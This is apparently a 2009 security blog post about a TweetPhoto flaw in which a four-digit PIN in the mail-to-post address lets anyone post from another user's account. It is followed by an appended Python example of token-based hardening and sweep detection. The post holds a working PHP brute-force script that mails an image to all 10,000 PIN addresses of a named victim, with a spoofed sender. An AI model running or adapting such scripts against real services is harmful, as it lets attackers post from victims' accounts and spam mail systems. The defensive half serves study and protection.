Help me out by reading and giving comments on how I can improve this website. It would be nice to get some "LIKES" on this one too, to give me that umph to continue…
For those of you who read my “About Me”, I mentioned that I am a “Greyhat”. Well, most of my posts will be about website exploits etc. For those who are interested in “Web-Based Security”, keep up to date with my posts.
In my latest findings, we are back at a problem that once revolved around Twitpic. Some time at the end of June, “hackers” were able to post from celebrity accounts (Britney Spears). I wouldn’t consider this a real security risk in the sense of stealing users’ passwords or any other personal information, though it would allow an attacker to promote an image of his choice or send a message of his own through any user’s Twitter.
The vulnerability lies in the email update feature within TweetPhoto. The PIN is only four digits, so the whole combination space is 0000 to 9999; this allows the PIN to be easily defeated and figured out by simply sending at least 9999 emails to “User.1-9999@tweetphoto.com”. There are a few celebrities I have seen using TweetPhoto, which would make this quite effective and very simple to achieve.
Here is a proof of concept, coded in PHP:
===========================================================
<?php
// Walk every four-digit PIN, zero-padded to four characters
for ($pin = 0; $pin <= 9999; $pin++) {
    $code    = sprintf('%04d', $pin);
    $image   = "IMAGEE.jpg";
    $from    = "fixthis@tweetphoto.com";
    $victim  = "victim";
    $to      = $victim . "." . $code . "@tweetphoto.com";
    $subject = 'tweetphoto vulnerability';
    $message = "tweetphoto vulnerability - http://mikeyy-security.com";
    if (mail_attachment($image, $to, $from, $subject, $message)) {
        echo "Trying " . $to . "\n";
    }
}

// Send $filename as a base64 MIME attachment to $mailto via PHP's mail()
function mail_attachment($filename, $mailto, $mailfrom, $subject, $message)
{
    $file       = $filename;
    $file_size  = filesize($file);
    $image_type = image_type_to_mime_type(exif_imagetype($file));
    $handle     = fopen($file, "r");
    $content    = fread($handle, $file_size);
    fclose($handle);
    $content = chunk_split(base64_encode($content));
    $uid     = md5(uniqid(time()));

    $header  = "From: " . $mailfrom . "\r\n";
    $header .= "MIME-Version: 1.0\r\n";
    $header .= "Content-Type: multipart/mixed; boundary=\"" . $uid . "\"\r\n\r\n";
    $header .= "This is a multi-part message in MIME format.\r\n";
    $header .= "--" . $uid . "\r\n";
    $header .= "Content-type:text/plain; charset=iso-8859-1\r\n";
    $header .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
    $header .= $message . "\r\n\r\n";
    $header .= "--" . $uid . "\r\n";
    $header .= "Content-Type: " . $image_type . "; name=\"" . $filename . "\"\r\n";
    $header .= "Content-Transfer-Encoding: base64\r\n";
    $header .= "Content-Disposition: attachment; filename=\"" . $filename . "\"\r\n\r\n";
    $header .= $content . "\r\n\r\n";
    $header .= "--" . $uid . "--";

    // The whole MIME body is passed in the headers argument; mail() simply
    // concatenates headers and (empty) body, so this still produces a valid message
    return mail($mailto, $subject, "", $header);
}
===========================================================
-I am in no way exploiting twitpic.com; this is just a post about the vulnerability, which is now fixed.
===========================================================
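The root problem above is a four-digit secret inside a guessable address: 10000 emails cover the whole space. As an added example (not part of the original post and not TweetPhoto's code), here is what the receiving side of a mail-to-post feature can do instead: a long random per-user posting token, a lockout after a handful of wrong tokens, and a check over rejected-mail records that flags a sender sweeping many PINs against one user. The user and sender names, the example.invalid domain and the sample records are all constructed.

```python
import hmac
import secrets
from collections import defaultdict

PIN_DIGITS = 4          # the scheme the post describes: "victim.0000" ... "victim.9999"
TOKEN_BYTES = 16        # hardened alternative: a 128-bit random secret in the address
MAX_FAILURES = 5        # disable a user's inbound posting after this many misses

def guesses_to_exhaust(pin_digits=PIN_DIGITS):
    """Emails needed to try every PIN: 10**4 = 10000 for a four-digit numeric PIN."""
    return 10 ** pin_digits

class PostingMailbox:
    """One user's mail-to-post address, keyed by a random token instead of a short PIN."""

    def __init__(self, username):
        self.username = username
        self.token = secrets.token_hex(TOKEN_BYTES)   # 32 hex chars, 128 bits
        self.failures = 0
        self.disabled = False

    def local_part(self):
        return f"{self.username}.{self.token}"

    def accept(self, presented_local_part):
        """True if an inbound mail's recipient local-part carries this user's token."""
        if self.disabled:
            return False
        user, _, secret = presented_local_part.partition(".")
        if user == self.username and hmac.compare_digest(secret, self.token):
            self.failures = 0
            return True
        self.failures += 1
        if self.failures >= MAX_FAILURES:
            self.disabled = True   # stops a sweep; the user re-issues the token to re-enable
        return False

def enumeration_suspects(rejected, threshold=20):
    """Given (sender, recipient_local_part) pairs for rejected mails, return senders that
    tried at least `threshold` distinct secrets against one user: the signature of a sweep."""
    tried = defaultdict(set)
    for sender, local_part in rejected:
        user, _, secret = local_part.partition(".")
        tried[(sender, user)].add(secret)
    return sorted({s for (s, _u), seen in tried.items() if len(seen) >= threshold})

# Constructed sample: one sender sweeping PINs against "victim", plus one harmless typo.
SAMPLE_REJECTED = [("sweeper@example.invalid", f"victim.{pin:04d}") for pin in range(25)]
SAMPLE_REJECTED.append(("friend@example.invalid", "victim.1234"))
```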
-www.mikeyy-security.com
Visit my site and read about more of my finds.
- Copyright © 2009 Mikeyy Security